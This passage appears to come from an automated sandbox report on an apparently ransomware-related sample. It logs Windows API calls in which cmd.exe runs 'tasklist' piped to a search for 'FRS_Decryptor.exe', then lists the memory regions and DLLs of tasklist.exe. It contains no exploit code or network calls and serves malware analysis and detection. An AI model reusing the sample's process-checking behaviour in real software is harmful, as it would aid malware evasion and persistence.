[0088.485] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0088.485] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0088.486] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xbef4d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbef51c | out: lpCommandLine="tasklist", lpProcessInformation=0xbef51c*(hProcess=0x64, hThread=0x60, dwProcessId=0x40c, dwThreadId=0x454)) returned 1 [0088.489] CloseHandle (hObject=0x60) returned 1 [0088.489] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0088.489] GetEnvironmentStringsW () returned 0xe742d8* [0088.489] FreeEnvironmentStringsA (penv="=") returned 1 [0088.489] DeleteProcThreadAttributeList (in: lpAttributeList=0xbef548 | out: lpAttributeList=0xbef548) [0088.489] _get_osfhandle (_FileHandle=3) returned 0x54 [0088.489] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0088.489] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0088.489] _close (_FileHandle=5) returned 0 [0088.489] _dup (_FileHandle=0) returned 4 [0088.489] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0088.489] _close (_FileHandle=3) returned 0 [0088.489] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0088.489] SetErrorMode (uMode=0x0) returned 0x0 [0088.489] SetErrorMode (uMode=0x1) returned 0x0 [0088.490] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe742e0, lpFilePart=0xbef5ec | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef5ec*="Desktop") returned 0x1c [0088.490] SetErrorMode (uMode=0x0) returned 0x1 [0088.490] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.490] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0088.490] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.490] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.490] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xffffffff [0088.490] GetLastError () returned 0x2 [0088.490] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.490] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xe75628 [0088.490] FindClose (in: hFindFile=0xe75628 | out: hFindFile=0xe75628) returned 1 [0088.490] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xffffffff [0088.490] GetLastError () returned 0x2 [0088.490] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xe75628 [0088.490] FindClose (in: hFindFile=0xe75628 | out: hFindFile=0xe75628) returned 1 [0088.490] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0088.490] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0088.491] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0088.491] SetErrorMode (uMode=0x0) returned 0x0 [0088.491] SetErrorMode (uMode=0x1) returned 0x0 [0088.491] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe74668, lpFilePart=0xbef394 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef394*="Desktop") returned 0x1c [0088.491] SetErrorMode (uMode=0x0) returned 0x1 [0088.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.491] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0088.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.491] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.491] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xffffffff [0088.491] GetLastError () returned 0x2 [0088.491] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.491] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xe704a0 [0088.492] FindClose (in: hFindFile=0xe704a0 | out: hFindFile=0xe704a0) returned 1 [0088.492] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xffffffff [0088.492] GetLastError () returned 0x2 [0088.492] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xe704a0 [0088.492] FindClose (in: hFindFile=0xe704a0 | out: hFindFile=0xe704a0) returned 1 [0088.492] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0088.492] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0088.492] GetConsoleTitleW (in: lpConsoleTitle=0xbef61c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0088.492] InitializeProcThreadAttributeList (in: lpAttributeList=0xbef548, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbef52c | out: lpAttributeList=0xbef548, lpSize=0xbef52c) returned 1 [0088.492] UpdateProcThreadAttribute (in: lpAttributeList=0xbef548, dwFlags=0x0, Attribute=0x60001, lpValue=0xbef534, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbef548, lpPreviousValue=0x0) returned 1 [0088.492] GetStartupInfoW (in: lpStartupInfo=0xbef580 | out: lpStartupInfo=0xbef580*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2a0, hStdError=0x2c)) [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.492] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0088.493] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0088.493] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0088.493] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xbef4d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbef51c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xbef51c*(hProcess=0x60, hThread=0x54, dwProcessId=0x308, dwThreadId=0x3d8)) returned 1 [0088.496] CloseHandle (hObject=0x54) returned 1 [0088.496] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0088.496] GetEnvironmentStringsW () returned 0xe7ad78* [0088.496] FreeEnvironmentStringsA (penv="=") returned 1 [0088.496] DeleteProcThreadAttributeList (in: lpAttributeList=0xbef548 | out: lpAttributeList=0xbef548) [0088.496] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0088.496] _close (_FileHandle=4) returned 0 [0088.496] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0088.921] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xbef890 | out: lpExitCode=0xbef890*=0x0) returned 1 [0088.921] CloseHandle (hObject=0x64) returned 1 [0088.921] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0088.923] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xbef890 | out: lpExitCode=0xbef890*=0x0) returned 1 [0088.923] CloseHandle (hObject=0x60) returned 1 [0088.923] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0088.923] SetConsoleMode (hConsoleHandle=0x2a0, dwMode=0x0) returned 0 [0088.923] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0088.923] GetConsoleMode (in: hConsoleHandle=0x2a0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0088.923] _get_osfhandle (_FileHandle=0) returned 0x24 [0088.923] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0088.923] SetConsoleInputExeNameW () returned 0x1 [0088.923] GetConsoleOutputCP () returned 0x1b5 [0088.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0088.923] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.924] exit (_Code=0) Process: id = "75" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x10c2c000" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "74" os_parent_pid = "0x8c8" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3993 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 3994 start_va = 0x880000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 3995 start_va = 0x8a0000 end_va = 0x8a1fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 3996 start_va = 0x8b0000 end_va = 0x8befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 3997 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 3998 start_va = 0x900000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3999 start_va = 0x940000 end_va = 0x943fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 4000 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 4001 start_va = 0x960000 end_va = 0x961fff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 4002 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4003 start_va = 0x7fd50000 end_va = 0x7fd72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fd50000" filename = "" Region: id = 4004 start_va = 0x7fd79000 end_va = 0x7fd79fff entry_point = 0x0 region_type = private name = "private_0x000000007fd79000" filename = "" Region: id = 4005 start_va = 0x7fd7a000 end_va = 0x7fd7afff entry_point = 0x0 region_type = private name = "private_0x000000007fd7a000" filename = "" Region: id = 4006 start_va = 0x7fd7d000 end_va = 0x7fd7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd7d000" filename = "" Region: id = 4007 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4008 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4009 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4010 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4030 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 4031 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4032 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4033 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4038 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4039 start_va = 0x890000 end_va = 0x893fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 4040 start_va = 0x8a0000 end_va = 0x8a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 4041 start_va = 0x970000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 4042 start_va = 0xa70000 end_va = 0xaedfff entry_point = 0xa70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4043 start_va = 0xaf0000 end_va = 0xaf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 4044 start_va = 0xb00000 end_va = 0xb00fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 4045 start_va = 0xb10000 end_va = 0xb10fff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 4046 start_va = 0xb20000 end_va = 0xb23fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4047 start_va = 0xb30000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 4048 start_va = 0xb40000 end_va = 0xb40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 4049 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 4050 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 4051 start_va = 0xc30000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 4052 start_va = 0xc40000 end_va = 0xdc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 4053 start_va = 0xdd0000 end_va = 0xf50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 4054 start_va = 0xf60000 end_va = 0x235ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 4055 start_va = 0x2360000 end_va = 0x24a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 4056 start_va = 0x24b0000 end_va = 0x2784fff entry_point = 0x24b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4057 start_va = 0x2790000 end_va = 0x2b8bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 4058 start_va = 0x73420000 end_va = 0x73461fff entry_point = 0x73420000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4059 start_va = 0x73470000 end_va = 0x734d0fff entry_point = 0x73470000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4060 start_va = 0x734e0000 end_va = 0x734ebfff entry_point = 0x734e0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4061 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 4062 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4063 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4064 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4065 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 4066 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4067 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4068 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4069 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4070 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4071 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4072 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4073 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4074 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4075 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4076 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4077 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4078 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4079 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4080 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename 